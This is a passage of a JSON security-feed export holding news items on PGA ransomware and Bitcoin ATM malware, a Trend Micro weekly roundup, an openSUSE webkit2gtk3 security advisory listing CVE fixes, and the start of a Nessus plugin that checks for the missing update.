to make American presidential elections questionable, now cybercriminals have their eyes set on key PGA tournaments. Reportedly, to jeopardize this week\u2019s PGA Championship, which is due to be held at [\u2026]\n\nThis is a post from HackRead.com Read the original post: [PGA Golf Championship hit with Bitcoin ransomware](<https://www.hackread.com/pga-golf-championship-hit-with-bitcoin-ransomware/>)", "reporter": "Waqas", "published": "2018-08-10T22:47:03", "type": "hackread", "title": "PGA Golf Championship hit with Bitcoin ransomware", "enchantments": {"score": {"modified": "2018-08-11T01:07:01", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-08-10T22:47:03", "id": "HACKREAD:DF62540CF10E554E3B5A3460BA8B353A", "href": "https://www.hackread.com/pga-golf-championship-hit-with-bitcoin-ransomware/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-10T23:15:33", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "By [Uzair Amir](<https://www.hackread.com/author/uzair/>)\n\nTrend Micro researchers have discovered a malware listing on Dark Web marketplace that lets attackers steal from Bitcoin ATMs. They can easily rake in cryptocurrency worth 6,750 in Euros, Pounds or Dollars by attacking the ATMs. The listing was perhaps created on June 25, 2018. It is available at a whopping price tag of $25,000. [\u2026]\n\nThis is a post from HackRead.com Read the original post: [Cyber Criminals selling Bitcoin ATM Malware on Dark Web](<https://www.hackread.com/sellers-demanding-25000-for-bitcoin-atm-malware-at-the-dark-web/>)", "reporter": "Uzair Amir", "published": "2018-08-10T10:14:58", "type": "hackread", "title": "Cyber Criminals selling Bitcoin ATM Malware on Dark Web", "enchantments": {"score": {"modified": "2018-08-10T23:15:33", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-08-10T10:14:58", "id": "HACKREAD:043095D83400E580149E7334FDED43ED", "href": "https://www.hackread.com/sellers-demanding-25000-for-bitcoin-atm-malware-at-the-dark-web/", "cvss": {"score": 0.0, "vector": "NONE"}}], "trendmicroblog": [{"lastseen": "2018-08-10T17:05:00", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "![](https://blog.trendmicro.com/wp-content/uploads/2018/05/Week-in-Security-News-Logo_RGB-300x300.jpg)\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, Singapore looks into the effectiveness of virtual browsers in an attempt to reduce cyberattacks on healthcare systems. Also, cybercriminals have hijacked the computer servers of the Professional Golfers\u2019 Association, locking officials out of crucial files related to upcoming rounds in the PGA Championship and the Ryder Cup in France.\n\nRead on:\n\n**[A Look Into Smart Factories: A Model of IIoT Innovation](<https://www.trendmicro.com/vinfo/us/security/news/internet-of-things/a-look-into-smart-factories-a-model-of-iiot-innovation>)**\n\n_Organizations worldwide are integrating the internet of things (IoT) closely into how they do business, a move that is as much about keeping up with the rest of the world as it is about improving operations._\n\n**[Brian Gorenc at Black Hat 2018](<https://livestream.com/accounts/17221955/BlackHatUSA2018/videos/178675497>)**\n\n_Chuck Harold from Security Guy TV interviews Brian Gorenc onsite at Black Hat 2018 to discuss Trend Micro\u2019s depth of research and products across enterprise, consumer and IoT threats. _\n\n**[Ransomware as a Service Princess Evolution Looking for Affiliates](<https://blog.trendmicro.com/trendlabs-security-intelligence/ransomware-as-a-service-princess-evolution-looking-for-affiliates/>)**\n\n_We have been observing a malvertising campaign via Rig exploit kit delivering a cryptocurrency-mining malware and the GandCrab ransomware since July 25. On August 1, we found Rig\u2019s traffic stream dropping a then-unknown ransomware._\n\n**[Fighting the Skills Gap Via Industry Leading Research and Inspiring Events](<https://blog.trendmicro.com/fighting-the-skills-gap-via-industry-leading-research-and-inspiring-events/>)**\n\n_Among the headline-grabbing reports of election hacking, nation-state raids on utilities firms, and mega-data breaches, few ask the question: Did the cybersecurity skills shortage play a part?_\n\n**[Hackers Could Use Facial Recognition AI to Sway Political Campaigns](<https://www.cbsnews.com/news/local-politics-cybersecurity-hacking-artificial-intelligence-black-hat-convention-2018-las-vegas/>)**\n\n_CNET senior producer Dan Patterson, who is covering the Black Hat USA hacker convention in Las Vegas, says AI could soon play a role in infiltrating computers and common software used by consumers._\n\n**[How Machine Learning Can Help Identify Web Defacement Campaigns](<https://blog.trendmicro.com/trendlabs-security-intelligence/how-machine-learning-can-help-identify-web-defacement-campaigns/>)**\n\n_TrendMicro expounsd on why machine learning (ML) was an ideal method for analysis to understand better how web defacers operate and organize themselves._\n\n**[Singapore Explores Virtual Browsers Following SingHealth Data Breach](<https://www.zdnet.com/article/singapore-explores-virtual-browsers-following-singhealth-data-breach/>)**\n\n_Singapore is assessing the feasibility of virtual browsers to reduce the attack surface of healthcare systems following a critical cybersecurity breach that compromised the personal data of 1.5 million patients._\n\n**[Data Breaches Highlight the Need for Managed Detection and Response](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/data-breaches-highlight-the-need-for-managed-detection-and-response>)**\n\n_Whether from misconfiguration, patch lags, or unsecure networks, bridging security gaps and remediating attacks calls for a proactive approach \u2014 something that MDR can provide._\n\n**[Hackers Target PGA Servers, Seek Bitcoin Ransom](<https://golfweek.com/2018/08/08/hackers-target-pga-servers-seek-bitcoin-ransom/>)**\n\n_Cybercriminals have hijacked the Professional Golfers\u2019 Association (PGA) of America\u2019s computer servers, locking officials out of crucial files related to the PGA Championship and upcoming Ryder Cup in France._\n\nDo you think Machine Learning can help industry professionals understand how web defacers operate? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\nThe post [This Week in Security News: Hijacks and Healthcare](<https://blog.trendmicro.com/this-week-in-security-news-hijacks-and-healthcare/>) appeared first on [](<https://blog.trendmicro.com>).", "reporter": "Jon Clay (Global Threat Communications)", "published": "2018-08-10T14:56:36", "type": "trendmicroblog", "title": "This Week in Security News: Hijacks and Healthcare", "enchantments": {"score": {"modified": "2018-08-10T17:05:00", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-08-10T14:56:36", "id": "TRENDMICROBLOG:FC4EE7B03C3392A9C88E003AE9CFDB5D", "href": "https://blog.trendmicro.com/this-week-in-security-news-hijacks-and-healthcare/", "cvss": {"score": 0.0, "vector": "NONE"}}], "suse": [{"lastseen": "2018-08-10T04:48:17", "references": ["https://bugzilla.suse.com/1097693", "https://bugzilla.suse.com/1095611"], "affectedPackage": [{"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "webkit-jsc-4-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "webkit-jsc-4", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "typelib-1_0-JavaScriptCore-4_0-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "typelib-1_0-JavaScriptCore-4_0", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "webkit2gtk-4_0-injected-bundles-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "typelib-1_0-WebKit2WebExtension-4_0-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "typelib-1_0-WebKit2WebExtension-4_0", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "libjavascriptcoregtk-4_0-18-32bit-debuginfo-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "libjavascriptcoregtk-4_0-18-32bit-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "webkit2gtk3-debugsource-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "webkit2gtk3-debugsource", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "webkit2gtk-4_0-injected-bundles-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "webkit2gtk-4_0-injected-bundles", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "webkit2gtk3-devel-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "webkit2gtk3-devel", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "libjavascriptcoregtk-4_0-18-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "webkit2gtk-4_0-injected-bundles-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "webkit2gtk-4_0-injected-bundles-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "webkit2gtk-4_0-injected-bundles", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "libjavascriptcoregtk-4_0-18-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "libjavascriptcoregtk-4_0-18", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "libwebkit2gtk-4_0-37-32bit-debuginfo-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "libwebkit2gtk-4_0-37-32bit-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "libjavascriptcoregtk-4_0-18-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "webkit2gtk3-devel-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "webkit2gtk3-devel", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "typelib-1_0-JavaScriptCore-4_0-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "typelib-1_0-JavaScriptCore-4_0", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "libwebkit2gtk-4_0-37-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "libwebkit2gtk-4_0-37", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "noarch", "packageFilename": "libwebkit2gtk3-lang-2.20.3-lp150.2.3.1.noarch.rpm", "packageName": "libwebkit2gtk3-lang", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "libwebkit2gtk-4_0-37-debuginfo-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "libwebkit2gtk-4_0-37-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "webkit-jsc-4-debuginfo-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "webkit-jsc-4-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "webkit2gtk3-plugin-process-gtk2-debuginfo-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "webkit2gtk3-plugin-process-gtk2-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "typelib-1_0-WebKit2-4_0-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "typelib-1_0-WebKit2-4_0", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "libjavascriptcoregtk-4_0-18-32bit-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "libjavascriptcoregtk-4_0-18-32bit", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "libjavascriptcoregtk-4_0-18-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "libjavascriptcoregtk-4_0-18", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "webkit2gtk3-debugsource-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "webkit2gtk3-debugsource", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "libwebkit2gtk-4_0-37-debuginfo-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "libwebkit2gtk-4_0-37-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "webkit-jsc-4-debuginfo-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "webkit-jsc-4-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "webkit2gtk3-plugin-process-gtk2-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "webkit2gtk3-plugin-process-gtk2", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "webkit2gtk3-plugin-process-gtk2-debuginfo-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "webkit2gtk3-plugin-process-gtk2-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "libwebkit2gtk-4_0-37-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "libwebkit2gtk-4_0-37", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "webkit2gtk3-plugin-process-gtk2-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "webkit2gtk3-plugin-process-gtk2", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "typelib-1_0-WebKit2-4_0-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "typelib-1_0-WebKit2-4_0", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "webkit-jsc-4-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "webkit-jsc-4", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "x86_64", "packageFilename": "libwebkit2gtk-4_0-37-32bit-2.20.3-lp150.2.3.1.x86_64.rpm", "packageName": "libwebkit2gtk-4_0-37-32bit", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "15.0", "packageVersion": "2.20.3-lp150.2.3.1", "arch": "i586", "packageFilename": "typelib-1_0-WebKit2WebExtension-4_0-2.20.3-lp150.2.3.1.i586.rpm", "packageName": "typelib-1_0-WebKit2WebExtension-4_0", "operator": "lt"}], "description": "This update for webkit2gtk3 to version 2.20.3 fixes the following issues:\n\n These security issues were fixed:\n\n - CVE-2018-4190: An unspecified issue allowed remote attackers to obtain\n sensitive credential information that is transmitted during a CSS\n mask-image fetch (bsc#1097693).\n - CVE-2018-4199: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (buffer overflow and\n application crash) via a crafted web site (bsc#1097693)\n - CVE-2018-4218: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site that triggers an\n @generatorState use-after-free (bsc#1097693)\n - CVE-2018-4222: An unspecified issue allowed remote attackers to execute\n arbitrary code via a crafted web site that leverages a\n getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation (bsc#1097693)\n - CVE-2018-4232: An unspecified issue allowed remote attackers to\n overwrite cookies via a crafted web site (bsc#1097693)\n - CVE-2018-4233: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1097693)\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and\n webkitFaviconDatabaseSetIconURLForPageURL mishandle an unset pageURL,\n leading to an application crash (bsc#1095611).\n\n These non-security issues were fixed:\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n - Add user agent quirk for paypal website.\n - Fix a network process crash when trying to get cookies of about:blank\n page.\n - Fix UI process crash when closing the window under Wayland.\n - Fix several crashes and rendering issues.\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "reporter": "Suse", "published": "2018-08-10T03:08:49", "title": "Security update for webkit2gtk3 (moderate)", "type": "suse", "enchantments": {"score": {"modified": "2018-08-10T04:48:17", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4232"], "modified": "2018-08-10T03:08:49", "id": "OPENSUSE-SU-2018:2285-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-08/msg00031.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-08-10T23:11:40", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=1095611", "https://bugzilla.opensuse.org/show_bug.cgi?id=1097693"], "pluginID": "111626", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the following issues :\n\nThese security issues were fixed :\n\n - CVE-2018-4190: An unspecified issue allowed remote attackers to obtain sensitive credential information that is transmitted during a CSS mask-image fetch (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a crafted website (bsc#1097693) \n\n - CVE-2018-4218: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website that triggers an @generatorState use-after-free (bsc#1097693) \n\n - CVE-2018-4222: An unspecified issue allowed remote attackers to execute arbitrary code via a crafted website that leverages a getWasmBufferFromValue out-of-bounds read during WebAssembly compilation (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote attackers to overwrite cookies via a crafted website (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1097693) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL mishandle an unset pageURL, leading to an application crash (bsc#1095611).\n\nThese non-security issues were fixed :\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Fix a network process crash when trying to get cookies of about:blank page.\n\n - Fix UI process crash when closing the window under Wayland.\n\n - Fix several crashes and rendering issues. This update was imported from the SUSE:SLE-15:Update update project.", "edition": 1, "reporter": "Tenable", "published": "2018-08-10T00:00:00", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2018-845)", "type": "nessus", "enchantments": {"score": {"modified": "2018-08-10T23:11:40", "vector": "NONE", "value": 6.8}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4232"], "modified": "2018-08-10T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", "cpe:/o:novell:opensuse:15.0", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo"], "id": "OPENSUSE-2018-845.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111626", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-845.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111626);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/08/10 11:41:20\");\n\n script_cve_id(\"CVE-2018-11646\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2018-845)\");\n script_summary(english:\"Check for the openSUSE-2018-845 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.20.3 fixes the following\nissues :\n\nThese security issues were fixed :\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-4218: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers an @generatorState\n use-after-free (bsc#1097693) \n\n - CVE-2018-4222: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL\n and webkitFaviconDatabaseSetIconURLForPageURL mishandle\n an unset pageURL, leading to an application crash\n (bsc#1095611).\n\nThese non-security issues were fixed :\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues. This update\n was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1097693\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ 